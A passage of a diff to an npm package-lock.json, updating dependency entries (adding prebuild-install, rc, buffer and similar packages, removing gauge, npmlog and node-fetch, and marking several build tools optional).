"sha512-nne9/IiQ/hzIhY6pdDnbBtz7DjPTKrY00P/zvPSm5pOFkl6xuGrGnXn/VtTNNfNtAfZ9/1RtehkszU9qcTii0Q==" + "integrity": "sha512-nne9/IiQ/hzIhY6pdDnbBtz7DjPTKrY00P/zvPSm5pOFkl6xuGrGnXn/VtTNNfNtAfZ9/1RtehkszU9qcTii0Q==", + "optional": true }, "node_modules/agent-base": { "version": "6.0.2", "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-6.0.2.tgz", "integrity": "sha512-RZNwNclF7+MS/8bDg70amg32dyeZGZxiDuQmZxKLAlQjr3jGyLx+4Kkk58UO7D2QdgFIQCovuSuZESne6RG6XQ==", + "optional": true, "dependencies": { "debug": "4" }, @@ -116,6 +99,7 @@ "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", + "optional": true, "engines": { "node": ">=8" } @@ -123,34 +107,90 @@ "node_modules/aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", - "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==" - }, - "node_modules/are-we-there-yet": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-2.0.0.tgz", - "integrity": "sha512-Ci/qENmwHnsYo9xKIcUJN5LeDKdJ6R1Z1j9V/J5wyq8nh/mYPEpIKJbBZXtZjG04HiK7zV/p6Vs9952MrMeUIw==", - "dependencies": { - "delegates": "^1.0.0", - "readable-stream": "^3.6.0" - }, - "engines": { - "node": ">=10" - } + "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", + "optional": true }, "node_modules/balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" + "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", + "optional": true + }, + "node_modules/base64-js": { + "version": "1.5.1", + "resolved": "https://registry.npmjs.org/base64-js/-/base64-js-1.5.1.tgz", + "integrity": "sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "license": "MIT" + }, + "node_modules/bindings": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/bindings/-/bindings-1.5.0.tgz", + "integrity": "sha512-p2q/t/mhvuOj/UeLlV6566GD/guowlr0hHxClI0W9m7MWYkL1F0hLo+0Aexs9HSPCtR1SXQ0TD3MMKrXZajbiQ==", + "license": "MIT", + "dependencies": { + "file-uri-to-path": "1.0.0" + } + }, + "node_modules/bl": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/bl/-/bl-4.1.0.tgz", + "integrity": "sha512-1W07cM9gS6DcLperZfFSj+bWLtaPGSOHWhPiGzXmvVJbRLdG82sH/Kn8EtW1VqWVA54AKf2h5k5BbnIbwF3h6w==", + "license": "MIT", + "dependencies": { + "buffer": "^5.5.0", + "inherits": "^2.0.4", + "readable-stream": "^3.4.0" + } }, "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", + "version": "1.1.12", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz", + "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==", + "license": "MIT", + "optional": true, "dependencies": { "balanced-match": "^1.0.0", "concat-map": "0.0.1" } }, + "node_modules/buffer": { + "version": "5.7.1", + "resolved": "https://registry.npmjs.org/buffer/-/buffer-5.7.1.tgz", + "integrity": "sha512-EHcyIPBQ4BSGlvjB16k5KgAJ27CIsHY/2JBmCRReo48y9rQ3MaUzWX3KVlBa4U7MyX02HdVj0K7C3WaB3ju7FQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "license": "MIT", + "dependencies": { + "base64-js": "^1.3.1", + "ieee754": "^1.1.13" + } + }, "node_modules/cacache": { "version": "15.3.0", "resolved": "https://registry.npmjs.org/cacache/-/cacache-15.3.0.tgz", @@ -201,6 +241,7 @@ "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", + "optional": true, "bin": { "color-support": "bin.js" } @@ -208,17 +249,20 @@ "node_modules/concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" + "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", + "optional": true }, "node_modules/console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", - "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==" + "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", + "optional": true }, "node_modules/debug": { "version": "4.3.4", "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "optional": true, "dependencies": { "ms": "2.1.2" }, @@ -231,15 +275,41 @@ } } }, + "node_modules/decompress-response": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/decompress-response/-/decompress-response-6.0.0.tgz", + "integrity": "sha512-aW35yZM6Bb/4oJlZncMH2LCoZtJXTRxES17vE3hoRiowU2kWHaJKFkSBDnDR+cm9J+9QhXmREyIfv0pji9ejCQ==", + "license": "MIT", + "dependencies": { + "mimic-response": "^3.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/deep-extend": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/deep-extend/-/deep-extend-0.6.0.tgz", + "integrity": "sha512-LOHxIOaPYdHlJRtCQfDIVZtfw/ufM8+rVj649RIHzcm/vGwQRXFt6OPqIFWsm2XEMrNIEtWR64sY1LEKD2vAOA==", + "license": "MIT", + "engines": { + "node": ">=4.0.0" + } + }, "node_modules/delegates": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delegates/-/delegates-1.0.0.tgz", - "integrity": "sha512-bd2L678uiWATM6m5Z1VzNCErI3jiGzt6HGY8OVICs40JQq/HALfbyNJmp0UDakEY4pMMaN0Ly5om/B1VI/+xfQ==" + "integrity": "sha512-bd2L678uiWATM6m5Z1VzNCErI3jiGzt6HGY8OVICs40JQq/HALfbyNJmp0UDakEY4pMMaN0Ly5om/B1VI/+xfQ==", + "optional": true }, "node_modules/detect-libc": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/detect-libc/-/detect-libc-2.0.2.tgz", - "integrity": "sha512-UX6sGumvvqSaXgdKGUsgZWqcUyIXZ/vZTrlRT/iobiKhGL0zL4d3osHj3uqllWJK+i+sixDS/3COVEOFbupFyw==", + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/detect-libc/-/detect-libc-2.0.4.tgz", + "integrity": "sha512-3UDv+G9CsCKO1WKMGw9fwq/SWJYbI0c5Y7LU1AXYoDdbhE2AHQ6N6Nb34sG8Fj7T5APy8qXDCKuuIHd1BR0tVA==", + "license": "Apache-2.0", "engines": { "node": ">=8" } @@ -247,7 +317,8 @@ "node_modules/emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" + "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", + "optional": true }, "node_modules/encoding": { "version": "0.1.13", @@ -258,6 +329,15 @@ "iconv-lite": "^0.6.2" } }, + "node_modules/end-of-stream": { + "version": "1.4.5", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz", + "integrity": "sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==", + "license": "MIT", + "dependencies": { + "once": "^1.4.0" + } + }, "node_modules/env-paths": { "version": "2.2.1", "resolved": "https://registry.npmjs.org/env-paths/-/env-paths-2.2.1.tgz", @@ -273,6 +353,27 @@ "integrity": "sha512-2bmlRpNKBxT/CRmPOlyISQpNj+qSeYvcym/uT0Jx2bMOlKLtSy1ZmLuVxSEKKyor/N5yhvp/ZiG1oE3DEYMSFA==", "optional": true }, + "node_modules/expand-template": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/expand-template/-/expand-template-2.0.3.tgz", + "integrity": "sha512-XYfuKMvj4O35f/pOXLObndIRvyQ+/+6AhODh+OKWj9S9498pHHn/IMszH+gt0fBCRWMNfk1ZSp5x3AifmnI2vg==", + "license": "(MIT OR WTFPL)", + "engines": { + "node": ">=6" + } + }, + "node_modules/file-uri-to-path": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/file-uri-to-path/-/file-uri-to-path-1.0.0.tgz", + "integrity": "sha512-0Zt+s3L7Vf1biwWZ29aARiVYLx7iMGnEUl9x33fbB/j3jR81u/O2LbqK+Bm1CDSNDKVtJ/YjwY7TUd5SkeLQLw==", + "license": "MIT" + }, + "node_modules/fs-constants": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/fs-constants/-/fs-constants-1.0.0.tgz", + "integrity": "sha512-y6OAwoSIf7FyjMIv94u+b5rdheZEjzR63GTyZJm5qh4Bi+2YgwLCcI/fPFZkL5PSixOt6ZNKm+w+Hfp/Bciwow==", + "license": "MIT" + }, "node_modules/fs-minipass": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", @@ -287,31 +388,20 @@ "node_modules/fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" + "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", + "optional": true }, - "node_modules/gauge": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/gauge/-/gauge-3.0.2.tgz", - "integrity": "sha512-+5J6MS/5XksCuXq++uFRsnUd7Ovu1XenbeuIuNRJxYWjgQbPuFhT14lAvsWfqfAmnwluf1OwMjz39HjfLPci0Q==", - "dependencies": { - "aproba": "^1.0.3 || ^2.0.0", - "color-support": "^1.1.2", - "console-control-strings": "^1.0.0", - "has-unicode": "^2.0.1", - "object-assign": "^4.1.1", - "signal-exit": "^3.0.0", - "string-width": "^4.2.3", - "strip-ansi": "^6.0.1", - "wide-align": "^1.1.2" - }, - "engines": { - "node": ">=10" - } + "node_modules/github-from-package": { + "version": "0.0.0", + "resolved": "https://registry.npmjs.org/github-from-package/-/github-from-package-0.0.0.tgz", + "integrity": "sha512-SyHy3T1v2NUXn29OsWdxmK6RwHD+vkj3v8en8AOBZ1wBQ/hCAQ5bAQTD02kW4W9tUp/3Qh6J8r9EvntiyCmOOw==", + "license": "MIT" }, "node_modules/glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", + "optional": true, "dependencies": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", @@ -336,7 +426,8 @@ "node_modules/has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", - "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==" + "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", + "optional": true }, "node_modules/http-cache-semantics": { "version": "4.1.1", @@ -362,6 +453,7 @@ "version": "5.0.1", "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-5.0.1.tgz", "integrity": "sha512-dFcAjpTQFgoLMzC2VwU+C/CbS7uRL0lWmxDITmqm7C+7F0Odmj6s9l6alZc6AELXhrnggM2CeWSXHGOdX2YtwA==", + "optional": true, "dependencies": { "agent-base": "6", "debug": "4" @@ -391,6 +483,26 @@ "node": ">=0.10.0" } }, + "node_modules/ieee754": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/ieee754/-/ieee754-1.2.1.tgz", + "integrity": "sha512-dcyqhDvX1C46lXZcVqCpK+FtMRQVdIMN6/Df5js2zouUsqG7I6sFxitIC+7KYK29KdXOLHdu9zL4sFnoVQnqaA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "license": "BSD-3-Clause" + }, "node_modules/imurmurhash": { "version": "0.1.4", "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", @@ -419,6 +531,7 @@ "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", + "optional": true, "dependencies": { "once": "^1.3.0", "wrappy": "1" @@ -429,16 +542,31 @@ "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, - "node_modules/ip": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/ip/-/ip-2.0.1.tgz", - "integrity": "sha512-lJUL9imLTNi1ZfXT+DU6rBBdbiKGBuay9B6xGSPVjUeQwaH1RIGqef8RZkUtHioLmSNpPR5M4HVKJGm1j8FWVQ==", - "optional": true + "node_modules/ini": { + "version": "1.3.8", + "resolved": "https://registry.npmjs.org/ini/-/ini-1.3.8.tgz", + "integrity": "sha512-JV/yugV2uzW5iMRSiZAyDtQd+nxtUnjeLt0acNdw98kKLrvuRVyB80tsREOE7yvGVgalhZ6RNXCmEHkUKBKxew==", + "license": "ISC" + }, + "node_modules/ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", + "license": "MIT", + "optional": true, + "dependencies": { + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" + }, + "engines": { + "node": ">= 12" + } }, "node_modules/is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", + "optional": true, "engines": { "node": ">=8" } @@ -455,6 +583,13 @@ "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", "optional": true }, + "node_modules/jsbn": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==", + "license": "MIT", + "optional": true + }, "node_modules/lru-cache": { "version": "6.0.0", "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", @@ -466,28 +601,6 @@ "node": ">=10" } }, - "node_modules/make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dependencies": { - "semver": "^6.0.0" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/make-dir/node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "bin": { - "semver": "bin/semver.js" - } - }, "node_modules/make-fetch-happen": { "version": "9.1.0", "resolved": "https://registry.npmjs.org/make-fetch-happen/-/make-fetch-happen-9.1.0.tgz", @@ -515,10 +628,23 @@ "node": ">= 10" } }, + "node_modules/mimic-response": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/mimic-response/-/mimic-response-3.1.0.tgz", + "integrity": "sha512-z0yWI+4FDrrweS8Zmt4Ej5HdJmky15+L2e6Wgn3+iK5fWzb6T3fhNFq2+MeTRb064c6Wr4N/wv0DzQTjNzHNGQ==", + "license": "MIT", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, "node_modules/minimatch": { "version": "3.1.2", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", + "optional": true, "dependencies": { "brace-expansion": "^1.1.7" }, @@ -526,6 +652,15 @@ "node": "*" } }, + "node_modules/minimist": { + "version": "1.2.8", + "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", + "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, "node_modules/minipass": { "version": "3.3.6", "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", @@ -625,10 +760,23 @@ "node": ">=10" } }, + "node_modules/mkdirp-classic": { + "version": "0.5.3", + "resolved": "https://registry.npmjs.org/mkdirp-classic/-/mkdirp-classic-0.5.3.tgz", + "integrity": "sha512-gKLcREMhtuZRwRAfqP3RFW+TK4JqApVBtOIftVgjuABpAtpxhPGaDcfvbhNvD0B8iD1oUr/txX35NjcaY6Ns/A==", + "license": "MIT" + }, "node_modules/ms": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "optional": true + }, + "node_modules/napi-build-utils": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/napi-build-utils/-/napi-build-utils-2.0.0.tgz", + "integrity": "sha512-GEbrYkbfF7MoNaoh2iGG84Mnf/WZfB0GdGEsM8wz7Expx/LlWf5U8t9nvJKXSp3qr5IsEbK04cBGhol/KwOsWA==", + "license": "MIT" }, "node_modules/negotiator": { "version": "0.6.3", @@ -639,30 +787,24 @@ "node": ">= 0.6" } }, - "node_modules/node-addon-api": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/node-addon-api/-/node-addon-api-4.3.0.tgz", - "integrity": "sha512-73sE9+3UaLYYFmDsFZnqCInzPyh3MqIwZO9cw58yIqAZhONrrabrYyYe3TuIqtIiOuTXVhsGau8hcrhhwSsDIQ==" - }, - "node_modules/node-fetch": { - "version": "2.6.12", - "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.6.12.tgz", - "integrity": "sha512-C/fGU2E8ToujUivIO0H+tpQ6HWo4eEmchoPIoXtxCrVghxdKq+QOHqEZW7tuP3KlV3bC8FRMO5nMCC7Zm1VP6g==", + "node_modules/node-abi": { + "version": "3.75.0", + "resolved": "https://registry.npmjs.org/node-abi/-/node-abi-3.75.0.tgz", + "integrity": "sha512-OhYaY5sDsIka7H7AtijtI9jwGYLyl29eQn/W623DiN/MIv5sUqc4g7BIDThX+gb7di9f6xK02nkp8sdfFWZLTg==", + "license": "MIT", "dependencies": { - "whatwg-url": "^5.0.0" + "semver": "^7.3.5" }, "engines": { - "node": "4.x || >=6.0.0" - }, - "peerDependencies": { - "encoding": "^0.1.0" - }, - "peerDependenciesMeta": { - "encoding": { - "optional": true - } + "node": ">=10" } }, + "node_modules/node-addon-api": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/node-addon-api/-/node-addon-api-7.1.1.tgz", + "integrity": "sha512-5m3bsyrjFWE1xf7nz7YXdN4udnVtXK6/Yfgn5qnahL6bCkf2yKt4k3nuTKAtT4r3IG8JNR2ncsIMdZuAzJjHQQ==", + "license": "MIT" + }, "node_modules/node-gyp": { "version": "8.4.1", "resolved": "https://registry.npmjs.org/node-gyp/-/node-gyp-8.4.1.tgz", @@ -738,6 +880,7 @@ "version": "5.0.0", "resolved": "https://registry.npmjs.org/nopt/-/nopt-5.0.0.tgz", "integrity": "sha512-Tbj67rffqceeLpcRXrT7vKAN8CwfPeIBgM7E6iBkmKLV7bEMwpGgYLGv0jACUsECaa/vuxP0IjEont6umdMgtQ==", + "optional": true, "dependencies": { "abbrev": "1" }, @@ -748,25 +891,6 @@ "node": ">=6" } }, - "node_modules/npmlog": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-5.0.1.tgz", - "integrity": "sha512-AqZtDUWOMKs1G/8lwylVjrdYgqA4d9nu8hc+0gzRxlDb1I10+FHBGMXs6aiQHFdCUUlqH99MUMuLfzWDNDtfxw==", - "dependencies": { - "are-we-there-yet": "^2.0.0", - "console-control-strings": "^1.1.0", - "gauge": "^3.0.0", - "set-blocking": "^2.0.0" - } - }, - "node_modules/object-assign": { - "version": "4.1.1", - "resolved": "https://registry.npmjs.org/object-assign/-/object-assign-4.1.1.tgz", - "integrity": "sha512-rJgTQnkUnH1sFw8yT6VSU3zD3sWmu6sZhIseY8VX+GRu3P6F7Fu+JNDoXfklElbLJSnc3FUQHVe4cU5hj+BcUg==", - "engines": { - "node": ">=0.10.0" - } - }, "node_modules/once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", @@ -794,10 +918,37 @@ "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", + "optional": true, "engines": { "node": ">=0.10.0" } }, + "node_modules/prebuild-install": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/prebuild-install/-/prebuild-install-7.1.3.tgz", + "integrity": "sha512-8Mf2cbV7x1cXPUILADGI3wuhfqWvtiLA1iclTDbFRZkgRQS0NqsPZphna9V+HyTEadheuPmjaJMsbzKQFOzLug==", + "license": "MIT", + "dependencies": { + "detect-libc": "^2.0.0", + "expand-template": "^2.0.3", + "github-from-package": "0.0.0", + "minimist": "^1.2.3", + "mkdirp-classic": "^0.5.3", + "napi-build-utils": "^2.0.0", + "node-abi": "^3.3.0", + "pump": "^3.0.0", + "rc": "^1.2.7", + "simple-get": "^4.0.0", + "tar-fs": "^2.0.0", + "tunnel-agent": "^0.6.0" + }, + "bin": { + "prebuild-install": "bin.js" + }, + "engines": { + "node": ">=10" + } + }, "node_modules/promise-inflight": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/promise-inflight/-/promise-inflight-1.0.1.tgz", @@ -817,6 +968,31 @@ "node": ">=10" } }, + "node_modules/pump": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.3.tgz", + "integrity": "sha512-todwxLMY7/heScKmntwQG8CXVkWUOdYxIvY2s0VWAAMh/nd8SoYiRaKjlr7+iCs984f2P8zvrfWcDDYVb73NfA==", + "license": "MIT", + "dependencies": { + "end-of-stream": "^1.1.0", + "once": "^1.3.1" + } + }, + "node_modules/rc": { + "version": "1.2.8", + "resolved": "https://registry.npmjs.org/rc/-/rc-1.2.8.tgz", + "integrity": "sha512-y3bGgqKj3QBdxLbLkomlohkvsA8gdAiUQlSBJnBhfn+BPxg4bc62d8TcBW15wavDfgexCgccckhcZvywyQYPOw==", + "license": "(BSD-2-Clause OR MIT OR Apache-2.0)", + "dependencies": { + "deep-extend": "^0.6.0", + "ini": "~1.3.0", + "minimist": "^1.2.0", + "strip-json-comments": "~2.0.1" + }, + "bin": { + "rc": "cli.js" + } + }, "node_modules/readable-stream": { "version": "3.6.2", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-3.6.2.tgz", @@ -843,6 +1019,7 @@ "version": "3.0.2", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", + "optional": true, "dependencies": { "glob": "^7.1.3" }, @@ -895,12 +1072,59 @@ "node_modules/set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", - "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==" + "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", + "optional": true }, "node_modules/signal-exit": { "version": "3.0.7", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==" + "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", + "optional": true + }, + "node_modules/simple-concat": { + "version": "1.0.1", + "resolved": 